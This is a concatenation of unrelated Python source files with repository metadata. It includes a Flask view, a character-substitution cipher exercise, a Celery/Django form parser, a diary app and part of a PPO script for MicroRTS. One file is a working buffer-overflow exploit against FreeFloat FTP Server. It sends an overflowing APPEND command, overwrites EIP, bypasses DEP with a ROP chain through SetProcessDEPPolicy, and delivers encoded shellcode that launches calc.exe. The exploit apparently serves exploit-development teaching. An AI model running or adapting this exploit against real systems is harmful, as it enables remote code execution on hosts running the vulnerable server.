schema.runs.c.bkgd_mean,
schema.runs.c.bkgd_rms,
schema.runs.c.peak_flux,
schema.runs.c.tot_flux,
]
).where(schema.runs.c.run_id == run_id)
run_stats = db.execute(s).first()
# get all cubes produced for this run
j = schema.cubes.join(schema.runs).join(schema.cube_types)
s = (
select([schema.cubes.c.cube_id, schema.cube_types.c.cube_type])
.select_from(j)
.where(schema.runs.c.run_id == run_id)
).reduce_columns()
result = db.execute(s)
cubes_list = result.fetchall()
# go through and produce a nested list of cube, cube_images
# for each cube, get all the images and image paths
j = (
schema.cubes.join(schema.runs)
.join(schema.cube_types)
.join(schema.cube_images)
)
s = (
select([schema.cube_images])
.select_from(j)
.where(
and_(
(schema.cubes.c.cube_type_id == 0), (schema.runs.c.run_id == run_id)
)
)
.order_by(desc(schema.cube_images.c.frequency))
)
result = db.execute(s)
cube_images = result.fetchall()
image_paths = ["/" + cube_image["image_path"] for cube_image in cube_images]
return render_template(
"runs/run_id.html",
cube_types=cube_types,
combo_params=combo_params,
run_parameters=run_parameters,
run_stats=run_stats,
run_id=run_id,
image_paths=image_paths,
bokeh_script=bokeh_script,
bokeh_plot_div=bokeh_plot_div,
)
|
[
"iancze@gmail.com"
] |
iancze@gmail.com
|
e73ce0141e056aeb4865b7b2853949b6a3bd271b
|
0a919ab783d2fa8a052e6fb53ea797b10e3cb12d
|
/Bangalore/19th Jan 2013/FreeFloat_SetProcessDEPPloicy.py
|
5b16cb230799989035a0917c42a2088f3bdc5194
|
[] |
no_license
|
SirEOF/null
|
7e3969ffd605e1c7be88faff5ea9ad9819e7b1fe
|
e19e778b6aad8a156d9fe0fc92f9f9e44838c6d2
|
refs/heads/master
| 2021-05-27T12:33:55.648871
| 2014-08-12T08:00:25
| 2014-08-12T08:00:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,119
|
py
|
#!/usr/bin/python
import socket, sys, os, time
from struct import pack
print "\n+---------------------------------------+"
print "+ Freefloat FTP Server Buffer Overflow +"
print "+ HackSys Team - Panthera +"
print "+ Ashfaq Ansari +"
print "+ hacksysteam@hotmail.com +"
print "+ http://hacksys.vfreaks.com/ +"
print "+---------------------------------------+\n"
#Target IP address
target = "192.168.96.131"
#Target Port
port = 21
#Send 244 bytes of junk bytes
junk = "A" * 244
eip = pack('<L',0x7C90120F) #RETN
junk2 = "C" * 8
######################ROP using SetProcessDEPPolicy######################
rop = pack('<L',0x7cb856bf) #0x7cb856bf : # POP EBX # POP EBP # RETN 0C
rop += "\xff"*8
rop += pack('<L',0x7cada541) # : # INC EBX # ADD AL,3 # RETN )
rop += "D"*12
rop += pack('<L',0x7cbb4643) #0x7cbb4643 : # XOR EAX,EAX # POP EDI # POP ESI # POP EBP # RETN 08
rop += pack('<L',0x7C90120F) #RETN
rop += pack('<L',0x7C90120F) #RETN
rop += pack('<L',0x7c862144) #<- SetProcessDEPPolicy, into EBP
rop += pack('<L',0x7ca44fbd) #: # PUSHAD # RETN
##############################End ROP ####################################
#msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -b "\x00\x0a\x0d" -t c > calc.shellcode
#[*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)
#Size: 228 bytes
#Bad chars: \x00\x0a\x0d
esp_shellcode = ("\xd9\xc7\x2b\xc9\xd9\x74\x24\xf4\xb8\xef\x46\x88\xf0\x5d\xb1"
"\x33\x83\xc5\x04\x31\x45\x14\x03\x45\xfb\xa4\x7d\x0c\xeb\xa0"
"\x7e\xed\xeb\xd2\xf7\x08\xda\xc0\x6c\x58\x4e\xd5\xe7\x0c\x62"
"\x9e\xaa\xa4\xf1\xd2\x62\xca\xb2\x59\x55\xe5\x43\x6c\x59\xa9"
"\x87\xee\x25\xb0\xdb\xd0\x14\x7b\x2e\x10\x50\x66\xc0\x40\x09"
"\xec\x72\x75\x3e\xb0\x4e\x74\x90\xbe\xee\x0e\x95\x01\x9a\xa4"
"\x94\x51\x32\xb2\xdf\x49\x39\x9c\xff\x68\xee\xfe\x3c\x22\x9b"
"\x35\xb6\xb5\x4d\x04\x37\x84\xb1\xcb\x06\x28\x3c\x15\x4e\x8f"
"\xde\x60\xa4\xf3\x63\x73\x7f\x89\xbf\xf6\x62\x29\x34\xa0\x46"
"\xcb\x99\x37\x0c\xc7\x56\x33\x4a\xc4\x69\x90\xe0\xf0\xe2\x17"
"\x27\x71\xb0\x33\xe3\xd9\x63\x5d\xb2\x87\xc2\x62\xa4\x60\xbb"
"\xc6\xae\x83\xa8\x71\xed\xc9\x2f\xf3\x8b\xb7\x2f\x0b\x94\x97"
"\x47\x3a\x1f\x78\x10\xc3\xca\x3c\xee\x89\x57\x14\x66\x54\x02"
"\x24\xeb\x67\xf8\x6b\x15\xe4\x09\x14\xe2\xf4\x7b\x11\xaf\xb2"
"\x90\x6b\xa0\x56\x97\xd8\xc1\x72\xf4\xbf\x51\x1e\xd5\x5a\xd1"
"\x85\x29\xaf")
#Another Junk - NOP - No Operation Code
nops = "\x90" * 300
#Create socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Connecting to %s on port %d" % (target,port)
try:
#Connect to target port
s.connect((target,port))
#Receive 1024 bytes
s.recv(1024)
print "[+] Triggering Vulnerability - Sending junk data"
#Send vulnerable command
s.send("APPEND " + junk + eip + junk2 + rop + nops + esp_shellcode + "\r\n")
#Close the socket
s.close()
print "[+] Exploit Sent Successfully. Check for calc.exe"
except:
print "[-] Could not connect to %s on port %d" % (target,port)
#Exit the exploit
sys.exit(0)
|
[
"ashfaq_ansari1989@hotmail.com"
] |
ashfaq_ansari1989@hotmail.com
|
3950de9397b0d3f4b694e184e983d755ad198aa7
|
692c98fe9cda839b8c965e89de15b22747e36494
|
/homework/crawler .py
|
ae808fbc25bc3ae94ff499dd7e9efc1505a9ac93
|
[] |
no_license
|
linafeng/Py3
|
a609b6a12ffc461257d0292cb8f1178bd2746280
|
fa9d9f2c65a22080bc9725c22ab57211a816efc3
|
refs/heads/master
| 2020-06-24T15:01:37.812013
| 2020-05-11T08:06:05
| 2020-05-11T08:06:05
| 198,994,427
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,880
|
py
|
# -*- coding:utf-8 -*-
# https://www.zdic.net/zd/zb/cc1/
# pip3 install requests
# Library for making HTTP requests
import requests
# Library for regular-expression matching
import re
# Fetch the page source
html_result = requests.get("https://www.zdic.net/zd/zb/cc1/")
print(html_result.text)
# Regular expression that pulls every Chinese character out of the page source
reg = "href='/hans/(.*)' "
print(re.findall(reg, html_result.text))
# hans_list now contains the 2500 common Chinese characters we want
hans_list = re.findall(reg, html_result.text)
print(hans_list)
# The string to encrypt
input_message = "Hello,我来学院学习"
# Holds the encrypted string as it is built up
result = ""
'''
Encryption rule:
look up each input character in hans_list, take its position in the list
as the encrypted code, and separate the numbers with "|".
For example: 我爱中国 is encrypted as 29|30|12|24|
'''
for hans in input_message:
    for index, element in enumerate(hans_list):
        if hans == element:
            print(index)
            # print(element)
            result += str(index) + "|"
print("Encrypted data >>>> " + result)
# Split the encrypted string back into individual codes
index_list = result.split("|")
# print(index_list)
# Remove the empty element left over from the trailing "|"
index_list.remove("")
# print(index_list)
# Variable that stores the decrypted result
response_result = ""
# Walk through the list of codes
for index in index_list:
    # Convert each string in the list to an int
    int_index = int(index)
    response_result += hans_list[int_index]
print("Decrypted data >>>> " + response_result)
'''
print(ord('我'))
Homework: write your own encryption program that can encrypt and decrypt
text containing both English and Chinese, i.e. a passage that mixes the two;
punctuation does not need to be handled.
Rule: take the ASCII / code-point number of each character and separate the
numbers with "|".
Extension: make up your own rules and experiment with them.
Preparation: install the neo4j database and learn some simple Cypher
statements. Any version is fine.
'''
|
[
"740792225@qq.com"
] |
740792225@qq.com
|
1e7d3b7390fc94b7c2e696a74b0633d2085130fd
|
62063bd79b948aeae85c50ae2e64b2d6d77a2461
|
/catkin_ws/build/Bieke/src/imu/timesync_ros/catkin_generated/pkg.installspace.context.pc.py
|
586a11b3064a02c71c08820f02fa51a849177835
|
[] |
no_license
|
PanHongYang/Vehicle-sensing-system
|
978dc550baa1a11838045700efc6dbd0b70f7929
|
2720fef36f5c7ad8fbc6480dffdfe7e9cef6e416
|
refs/heads/main
| 2023-06-04T07:00:50.785549
| 2021-06-19T07:43:38
| 2021-06-19T07:43:38
| 378,354,624
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 463
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "${prefix}/include".split(';') if "${prefix}/include" != "" else []
PROJECT_CATKIN_DEPENDS = "dynamic_reconfigure;roscpp;message_runtime".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-ltimesync".split(';') if "-ltimesync" != "" else []
PROJECT_NAME = "timesync"
PROJECT_SPACE_DIR = "/home/a/catkin_ws/install"
PROJECT_VERSION = "1.0.0"
|
[
"36400535+PanHongYang@users.noreply.github.com"
] |
36400535+PanHongYang@users.noreply.github.com
|
f9b0e6b57b30524e0a3d3f85b1cdc4802288266e
|
ff29c013c24068e7409340ba1cd5b88cf3e82436
|
/kobocat/onadata/libs/tasks.py
|
7edd3faeef8e7d4a7fe8059abdb5aec4c47d82c6
|
[
"BSD-2-Clause"
] |
permissive
|
Jubair70/Acid-Survivors-MIS
|
01c64a0589e5ed275d9f1a9cf5973303ea4b937e
|
89f19607d18a6d4c88717527e2e8d557aaec2fa9
|
refs/heads/master
| 2021-05-26T11:26:34.503102
| 2019-08-26T10:38:59
| 2019-08-26T10:38:59
| 254,112,228
| 1
| 0
| null | 2020-04-08T14:53:52
| 2020-04-08T14:33:00
|
HTML
|
UTF-8
|
Python
| false
| false
| 10,820
|
py
|
__author__ = "Md Shiam Shabbir"
import os
import json
from django.db import connection
from django.shortcuts import get_object_or_404
from django.contrib.auth.models import User
from onadata.apps.logger.models import Instance, XForm
from celery import task
from celery.decorators import task
#from onadata.apps.main.database_utility import db_fetch_values, single_query, update_table
from datetime import timedelta
from celery.task.schedules import crontab
from celery.decorators import periodic_task
questionsDict = {}
groupNameList = []
'''
Tup related asyn process
@zinia
'''
def update_table(query):
try:
print query
# create a new cursor
cur = connection.cursor()
# execute the UPDATE statement
cur.execute(query)
# get the number of updated rows
vendor_id = cur.fetchone()[0]
print vendor_id
        # Commit the changes to the database
connection.commit()
# Close communication with the PostgreSQL database
cur.close()
except (Exception) as error:
print(error)
finally:
if connection is not None:
connection.close()
def single_query(query):
"""function for query where result is single"""
fetchVal = db_fetch_values(query)
if len(fetchVal) == 0:
return None
strType = map(str, fetchVal[0])
ans = strType[0]
return ans
def db_fetch_values(query):
"""
Fetch database result set as list of tuples
Args:
query (str): raw query string
Returns:
str: Returns database result set as list of tuples
"""
    cursor = connection.cursor()  # use the django connection imported above
cursor.execute(query)
fetch_val = cursor.fetchall()
cursor.close()
return fetch_val
@periodic_task(run_every=timedelta(seconds=10),name="populate_table_queue")
def queue_info_insert():
print "#####################task enter###################"
'''Getting all new instance in the queue '''
try:
instance_query = "select id, instance_id, xform_id from instance_queue where status='new'"
instance_queue = db_fetch_values(instance_query)
print 'inside'
'''calling procedure according form_id '''
for each in instance_queue:
function_query = 'select function_name from form_function where form_id =%s'%(each[2])
form_function = single_query(function_query)
if form_function is not None:
insert_data_query = "select %s(%s)"%(form_function,each[1])
result = single_query(insert_data_query)
if result == '0':
print 'update'
update_instance = "update instance_queue set status='old' and updated_at = now() where instance_id = %s"%(each[1])
update_table(update_instance)
except Exception, e:
print "db get error"
print str(e)
print "#####################task exit###################"
class Question:
"""This class represents a question object which stores
question name,question type and question label if exists."""
name = ''
question_type = ''
question_label = ''
def __init__(self, q_name,q_type,q_label):
self.name = q_name
self.question_type = q_type
self.question_label = q_label
def getQuestion_name(self):
return str(self.name)
def getQuestion_type(self):
return str(self.question_type)
def getQuestion_label(self):
return str(self.question_label)
@task()
def instance_parse():
#print 'success'
json_instances = get_instance_info()
parsed_json = json.loads(json_instances)
print parsed_json
for key in parsed_json:
questionsDict.clear()
del groupNameList[:]
try:
username = parsed_json[key]['username']
id_string = parsed_json[key]['xform_id_string']
json_q_data = json.loads(get_form_json(username,id_string))
#print json_data['children']
question_parsed = parseQuestions(json_q_data['children'],'',None)
if question_parsed:
json_instance_data = get_form_instance_data(username,id_string,int(key))
if json_instance_data is not None:
process_data_and_save(json_instance_data,username,id_string,int(key))
except Exception as e:
print e
def get_instance_info():
cursor = connection.cursor()
query = "select instance_to_parse.form_id_string,instance_to_parse.form_instance_id,instance_to_parse.form_id_int from instance_to_parse where is_new=TRUE "
#in (select instance_id from approval_instanceapproval where status like 'Approved')
try:
cursor.execute(query)
form_informations = cursor.fetchall()
rowcount = cursor.rowcount
except Exception as e:
print e
connection.rollback()
form_info_json = {}
#print form_informations
for info in form_informations:
data={}
form_id = int(info[2])
#print form_id
try:
xform = get_object_or_404(XForm, pk=form_id)
user_id = xform.user_id
owner = get_object_or_404(User, pk=user_id)
data['username'] = str(owner.username)
data['xform_id_string'] = str(xform.id_string)
form_info_json[str(info[1])] = data
except Exception as e:
print e
connection.rollback()
#print owner.username
cursor.close()
return json.dumps(form_info_json)
def get_form_json(username,id_string):
owner = get_object_or_404(User, username__iexact=username)
xform = get_object_or_404(XForm, user__username__iexact=username,
id_string__exact=id_string)
return xform.json
def parseQuestions(children,prefix,cleanReplacement):
idx = 0
if cleanReplacement is None:
cleanReplacement = '_'
for idx in range(len(children)):
question = children[idx]
q_name = question.get('name',None)
q_type = question.get('type',None)
q_label = question.get('label',None)
sub_children = question.get('children',None)
#print sub_children
if (sub_children is not None and (q_type == 'repeat' or q_type == 'group' or q_type == 'note')):
#print sub_children
groupNameList.append(str(q_name))
#print '####Group_q_name: '+str(q_name)
parseQuestions(question['children'],''+q_name+cleanReplacement,None)
else:
if prefix is not None:
questionsDict[str(prefix)+str(q_name)] = Question(q_name,q_type,q_label if q_label is not None else '')
else:
questionsDict[str(q_name)] = Question(q_name,q_type,q_label if q_label is not None else '')
#print str(groupNameList)
'''for key in questionsDict:
print questionsDict[key].getQuestion_name()'''
return True
def get_form_instance_data(username, id_string, instance_id):
#print instance_id
instance = None
try:
xform = get_object_or_404(XForm, user__username__iexact=username, id_string__exact=id_string)
instance = get_object_or_404(Instance, id=instance_id)
except Exception as e:
print e
return instance.json
def process_data_and_save(data,username,id_string,instance_id):
questionWithVal = {}
cleanRe = '/[\[\]\/]/g'
cleanReplacement = '_'
if data is not None:
cleanData = {}
print ('Data is currently Processing and trying to save...... ')
for key in data:
test_bool = False
q_value = data[key]
if any(grp_name in key for grp_name in groupNameList):
try:
isinst = isinstance(q_value, list)
if isinst:
# print '########################################'
for each in q_value:
for sub_key, value in each.iteritems():
#print sub_key,value
cleanKey = sub_key.replace('/','_')
if str(cleanKey) in cleanData:
cleanData[str(cleanKey)] += ','+ value.encode('utf8')
else:
cleanData[str(cleanKey)] = value.encode('utf8')
#print str(q_value)
else:
cleanKey = str(key).replace('/','_')
#print 'cleanKey: '+ str(cleanKey)
cleanData[str(cleanKey)] = q_value.encode('utf8')
test_bool = True
except Exception as e:
print e
#print str(key).split('/')[1]
#print 'matched'
else:
cleanKey = key.replace(cleanRe,cleanReplacement)
test_bool = False
cleanData[str(cleanKey)] = q_value.encode('utf8')
# if test_bool is True:
# print str(cleanData)
for q_key in questionsDict:
#print q_key
value = {}
ques_name = q_key
ques_label = questionsDict[q_key].getQuestion_label()
ques_type = questionsDict[q_key].getQuestion_type()
ques_value = cleanData.get(q_key,None)
value.update({
'question_label': str(ques_label),
'question_type' : str(ques_type),
'question_value' : str(ques_value)
})
if ques_value is not None:
questionWithVal[ques_name] = value
#value.clear()
try:
cursor = connection.cursor()
for key in questionWithVal:
group_name = ''
#print questionWithVal.get(key,None)
if 'question_group' in questionWithVal[key]:
group_name = str(questionWithVal[key]['question_group'])
cursor.execute("BEGIN")
cursor.callproc("set_instance_parse_data",(str(id_string),int(instance_id),str(key),json.dumps(questionWithVal[key])))
cursor.execute("COMMIT")
update_is_new_query = "UPDATE public.instance_to_parse SET is_new = FALSE WHERE form_instance_id = "+str(instance_id)
cursor.execute(update_is_new_query)
#print update_is_new_query
cursor.close()
except Exception as e:
print e
# Open a file
#fo = open("q_dict.txt", "wb")
#fo.write( str(questionWithVal));
# Close opend file
#fo.close()
#print str(questionWithVal)
|
[
"jubair@mpower-social.com"
] |
jubair@mpower-social.com
|
40325fc0db4ad916152b5e05cc2ddac1ad359549
|
e46060998dbdf09a152f54a311708d357885ec28
|
/treehouse/Using Databases in Python - Modeling/diary.py
|
ecb4d71cfbb0c5c19508c267e4998fd68c92adb5
|
[] |
no_license
|
GabrielaLBazan/nfad2
|
cc03d4b528388a33d7047330c943aefb45e81499
|
b89fe8e606c4ca4f0cc2f7cb5ea6934c8eb078e0
|
refs/heads/master
| 2020-05-29T22:34:15.293023
| 2017-08-22T23:30:26
| 2017-08-22T23:30:26
| 82,612,707
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,448
|
py
|
#!/usr/bin/env python3
from collections import OrderedDict
import datetime
import os
import sys
from peewee import *
db = SqliteDatabase('diary.db')
class Entry(Model):
content = TextField()
timestamp = DateTimeField(default=datetime.datetime.now)
class Meta:
database = db
def initialize():
"""Create the database and the table if they don't exist."""
db.connect()
db.create_tables([Entry], safe=True)
def clear():
os.system('cls' if os.name == 'nt' else 'clear')
def menu_loop():
"""Show the menu"""
choice = None
while choice != 'q':
clear()
print("Enter 'q' to quit.")
for key, value in menu.items():
print('{}) {}'.format(key, value.__doc__))
choice = input('Action: ').lower().strip()
if choice in menu:
clear()
menu[choice]()
def add_entry():
"""Add an entry."""
print("Enter your entry. Press ctrl+d when finished.")
data = sys.stdin.read().strip()
if data:
if input('Save entry? [Yn] ').lower() != 'n':
Entry.create(content=data)
print("Saved successfully!")
def view_entries(search_query=None):
"""View previous entries."""
entries = Entry.select().order_by(Entry.timestamp.desc())
if search_query:
entries = entries.where(Entry.content.contains(search_query))
for entry in entries:
timestamp = entry.timestamp.strftime('%A %B %d, %Y %I:%M%p')
clear()
print(timestamp)
print('='*len(timestamp))
print(entry.content)
print('\n\n'+'='*len(timestamp))
print('n) next entry')
print('d) delete entry')
print('q) return to main menu')
next_action = input('Action: [Ndq] ').lower().strip()
if next_action == 'q':
break
elif next_action == 'd':
delete_entry(entry)
def search_entries():
"""Search entries for a string."""
view_entries(input('Search query: '))
def delete_entry(entry):
"""Delete an entry."""
if input("Are you sure? [yN] ").lower() == 'y':
entry.delete_instance()
print("Entry deleted")
menu = OrderedDict([
('a', add_entry),
('v', view_entries),
('s', search_entries),
])
if __name__ == '__main__':
initialize()
menu_loop()
|
[
"github@gabrielabazan.com"
] |
github@gabrielabazan.com
|
b9f0f7778bb25c82cc5db46b9da0d0480c6ae359
|
5b4fc401c25e83f62eafd88b76b5c7f19f94f6c8
|
/experiments/historic_scripts/ppo_partial_autoregressive.py
|
96f893613c8e3222750b44165b7909b2ac867032
|
[] |
no_license
|
sigvol/gym-microrts
|
5efc311ad2c0f31d997fcb8ae0f98e71d72fb89d
|
63ea1278b2b11e8369288ccbc47398d3310a4fec
|
refs/heads/master
| 2023-05-15T10:24:44.403280
| 2021-06-15T20:58:34
| 2021-06-15T20:58:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 22,594
|
py
|
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.distributions.categorical import Categorical
from torch.utils.tensorboard import SummaryWriter
import argparse
from distutils.util import strtobool
import numpy as np
import gym
import gym_microrts
from gym.wrappers import TimeLimit, Monitor
from gym.spaces import Discrete, Box, MultiBinary, MultiDiscrete, Space
import time
import random
import os
from stable_baselines3.common.vec_env import DummyVecEnv, SubprocVecEnv, VecEnvWrapper
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='PPO agent')
# Common arguments
parser.add_argument('--exp-name', type=str, default=os.path.basename(__file__).rstrip(".py"),
help='the name of this experiment')
parser.add_argument('--gym-id', type=str, default="MicrortsDefeatWorkerRushEnemyShaped-v3",
help='the id of the gym environment')
parser.add_argument('--learning-rate', type=float, default=2.5e-4,
help='the learning rate of the optimizer')
parser.add_argument('--seed', type=int, default=1,
help='seed of the experiment')
parser.add_argument('--total-timesteps', type=int, default=10000000,
help='total timesteps of the experiments')
parser.add_argument('--torch-deterministic', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='if toggled, `torch.backends.cudnn.deterministic=False`')
parser.add_argument('--cuda', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='if toggled, cuda will not be enabled by default')
parser.add_argument('--prod-mode', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='run the script in production mode and use wandb to log outputs')
parser.add_argument('--capture-video', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
                        help='whether to capture videos of the agent performances (check out `videos` folder)')
parser.add_argument('--wandb-project-name', type=str, default="cleanRL",
help="the wandb's project name")
parser.add_argument('--wandb-entity', type=str, default=None,
help="the entity (team) of wandb's project")
# Algorithm specific arguments
parser.add_argument('--n-minibatch', type=int, default=4,
help='the number of mini batch')
parser.add_argument('--num-envs', type=int, default=4,
help='the number of parallel game environment')
parser.add_argument('--num-steps', type=int, default=128,
help='the number of steps per game environment')
parser.add_argument('--gamma', type=float, default=0.99,
help='the discount factor gamma')
parser.add_argument('--gae-lambda', type=float, default=0.95,
help='the lambda for the general advantage estimation')
parser.add_argument('--ent-coef', type=float, default=0.01,
help="coefficient of the entropy")
parser.add_argument('--vf-coef', type=float, default=0.5,
help="coefficient of the value function")
parser.add_argument('--max-grad-norm', type=float, default=0.5,
help='the maximum norm for the gradient clipping')
parser.add_argument('--clip-coef', type=float, default=0.1,
help="the surrogate clipping coefficient")
parser.add_argument('--update-epochs', type=int, default=4,
help="the K epochs to update the policy")
parser.add_argument('--kle-stop', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='If toggled, the policy updates will be early stopped w.r.t target-kl')
parser.add_argument('--kle-rollback', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='If toggled, the policy updates will roll back to previous policy if KL exceeds target-kl')
parser.add_argument('--target-kl', type=float, default=0.03,
help='the target-kl variable that is referred by --kl')
parser.add_argument('--gae', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='Use GAE for advantage computation')
parser.add_argument('--norm-adv', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help="Toggles advantages normalization")
parser.add_argument('--anneal-lr', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help="Toggle learning rate annealing for policy and value networks")
parser.add_argument('--clip-vloss', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
                        help='Toggles whether or not to use a clipped loss for the value function, as per the paper.')
args = parser.parse_args()
if not args.seed:
args.seed = int(time.time())
args.batch_size = int(args.num_envs * args.num_steps)
args.minibatch_size = int(args.batch_size // args.n_minibatch)
class ImageToPyTorch(gym.ObservationWrapper):
def __init__(self, env):
super(ImageToPyTorch, self).__init__(env)
old_shape = self.observation_space.shape
self.observation_space = gym.spaces.Box(
low=0,
high=1,
shape=(old_shape[-1], old_shape[0], old_shape[1]),
dtype=np.int32,
)
def observation(self, observation):
return np.transpose(observation, axes=(2, 0, 1))
class VecPyTorch(VecEnvWrapper):
def __init__(self, venv, device):
super(VecPyTorch, self).__init__(venv)
self.device = device
def reset(self):
obs = self.venv.reset()
obs = torch.from_numpy(obs).float().to(self.device)
return obs
def step_async(self, actions):
actions = actions.cpu().numpy()
self.venv.step_async(actions)
def step_wait(self):
obs, reward, done, info = self.venv.step_wait()
obs = torch.from_numpy(obs).float().to(self.device)
reward = torch.from_numpy(reward).unsqueeze(dim=1).float()
return obs, reward, done, info
class MicroRTSStatsRecorder(gym.Wrapper):
def reset(self, **kwargs):
observation = super(MicroRTSStatsRecorder, self).reset(**kwargs)
self.raw_rewards = []
return observation
def step(self, action):
observation, reward, done, info = super(MicroRTSStatsRecorder, self).step(action)
self.raw_rewards += [info["raw_rewards"]]
if done:
raw_rewards = np.array(self.raw_rewards).sum(0)
raw_names = [str(rf) for rf in self.rfs]
info['microrts_stats'] = dict(zip(raw_names, raw_rewards))
self.raw_rewards = []
return observation, reward, done, info
# TRY NOT TO MODIFY: setup the environment
experiment_name = f"{args.gym_id}__{args.exp_name}__{args.seed}__{int(time.time())}"
writer = SummaryWriter(f"runs/{experiment_name}")
writer.add_text('hyperparameters', "|param|value|\n|-|-|\n%s" % (
'\n'.join([f"|{key}|{value}|" for key, value in vars(args).items()])))
if args.prod_mode:
import wandb
run = wandb.init(
project=args.wandb_project_name, entity=args.wandb_entity,
# sync_tensorboard=True,
config=vars(args), name=experiment_name, monitor_gym=True, save_code=True)
wandb.tensorboard.patch(save=False)
writer = SummaryWriter(f"/tmp/{experiment_name}")
CHECKPOINT_FREQUENCY = 50
# TRY NOT TO MODIFY: seeding
device = torch.device('cuda' if torch.cuda.is_available() and args.cuda else 'cpu')
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.backends.cudnn.deterministic = args.torch_deterministic
def make_env(gym_id, seed, idx):
def thunk():
env = gym.make(gym_id)
env = gym.wrappers.RecordEpisodeStatistics(env)
env = MicroRTSStatsRecorder(env)
env = ImageToPyTorch(env)
if args.capture_video:
if idx == 0:
env = Monitor(env, f'videos/{experiment_name}')
env.seed(seed)
env.action_space.seed(seed)
env.observation_space.seed(seed)
return env
return thunk
envs = VecPyTorch(DummyVecEnv([make_env(args.gym_id, args.seed+i, i) for i in range(args.num_envs)]), device)
# if args.prod_mode:
# envs = VecPyTorch(
# SubprocVecEnv([make_env(args.gym_id, args.seed+i, i) for i in range(args.num_envs)], "fork"),
# device
# )
assert isinstance(envs.action_space, MultiDiscrete), "only MultiDiscrete action space is supported"
# ALGO LOGIC: initialize agent here:
class CategoricalMasked(Categorical):
def __init__(self, probs=None, logits=None, validate_args=None, masks=[]):
self.masks = masks
if len(self.masks) == 0:
super(CategoricalMasked, self).__init__(probs, logits, validate_args)
else:
self.masks = masks.type(torch.BoolTensor).to(device)
logits = torch.where(self.masks, logits, torch.tensor(-1e+8).to(device))
super(CategoricalMasked, self).__init__(probs, logits, validate_args)
def entropy(self):
if len(self.masks) == 0:
return super(CategoricalMasked, self).entropy()
p_log_p = self.logits * self.probs
p_log_p = torch.where(self.masks, p_log_p, torch.tensor(0.).to(device))
return -p_log_p.sum(-1)
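    # Illustrative note (added; not in the original script): with
    # logits = torch.zeros(1, 4) and masks = torch.Tensor([[1, 0, 1, 0]]),
    # CategoricalMasked(logits=logits, masks=masks) can only ever sample
    # actions 0 or 2, because masked-out logits are replaced by -1e8 before
    # the softmax, and entropy() likewise zeroes the masked entries.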
class Scale(nn.Module):
def __init__(self, scale):
super().__init__()
self.scale = scale
def forward(self, x):
return x * self.scale
def layer_init(layer, std=np.sqrt(2), bias_const=0.0):
torch.nn.init.orthogonal_(layer.weight, std)
torch.nn.init.constant_(layer.bias, bias_const)
return layer
class Agent(nn.Module):
def __init__(self, frames=4):
super(Agent, self).__init__()
self.network = nn.Sequential(
layer_init(nn.Conv2d(27, 16, kernel_size=3, stride=2)),
nn.ReLU(),
layer_init(nn.Conv2d(16, 32, kernel_size=2)),
nn.ReLU(),
nn.Flatten(),
layer_init(nn.Linear(32*6*6, 256)),
nn.ReLU(),)
self.critic_head = layer_init(nn.Linear(256, 1), std=1)
map_size = 16*16
self.actor_source_unit_head = layer_init(nn.Linear(256, envs.action_space.nvec[0]), std=0.01)
self.actor_source_unit_embeddings = layer_init(nn.Linear(map_size, 256), std=0.01)
self.actor_others_head = layer_init(nn.Linear(256+envs.action_space.nvec[0], envs.action_space.nvec[1:].sum()), std=0.01)
def forward(self, x):
return self.network(x)
def get_action(self, x, action=None, invalid_action_masks=None, envs=None):
hidden_output = self.forward(x)
su_logits = self.actor_source_unit_head(hidden_output)
if action is None:
# 1. select source unit based on source unit mask
source_unit_mask = torch.Tensor(np.array(envs.env_method("get_unit_location_mask", player=1)))
multi_categoricals = [CategoricalMasked(logits=su_logits, masks=source_unit_mask)]
action_components = [multi_categoricals[0].sample()]
# 2. select action type and parameter section based on the
# source-unit mask of action type and parameters
source_unit_action_mask = torch.Tensor(
[envs.env_method("get_unit_action_mask", unit=action_components[0][i].item(), player=1, indices=i)[0]
for i in range(envs.num_envs)])
source_unit_embedding = F.one_hot(action_components[0], envs.action_space.nvec[0])
other_logits = self.actor_others_head(torch.cat((hidden_output, source_unit_embedding), 1))
split_logits = torch.split(other_logits, envs.action_space.nvec[1:].tolist(), dim=1)
split_suam = torch.split(source_unit_action_mask, envs.action_space.nvec.tolist()[1:], dim=1)
multi_categoricals = multi_categoricals + [CategoricalMasked(logits=logits, masks=iam) for (logits, iam) in zip(split_logits, split_suam)]
for categorical in multi_categoricals[1:]:
action_components += [categorical.sample()]
invalid_action_masks = torch.cat((source_unit_mask, source_unit_action_mask), 1)
action = torch.stack(action_components)
else:
split_invalid_action_masks = torch.split(invalid_action_masks, envs.action_space.nvec.tolist(), dim=1)
multi_categoricals = [CategoricalMasked(logits=su_logits, masks=split_invalid_action_masks[0])]
source_unit_embedding = F.one_hot(action[0], envs.action_space.nvec[0])
other_logits = self.actor_others_head(torch.cat((hidden_output, source_unit_embedding), 1))
split_logits = torch.split(other_logits, envs.action_space.nvec[1:].tolist(), dim=1)
multi_categoricals = multi_categoricals + [CategoricalMasked(logits=logits, masks=iam) for (logits, iam) in zip(split_logits, split_invalid_action_masks[1:])]
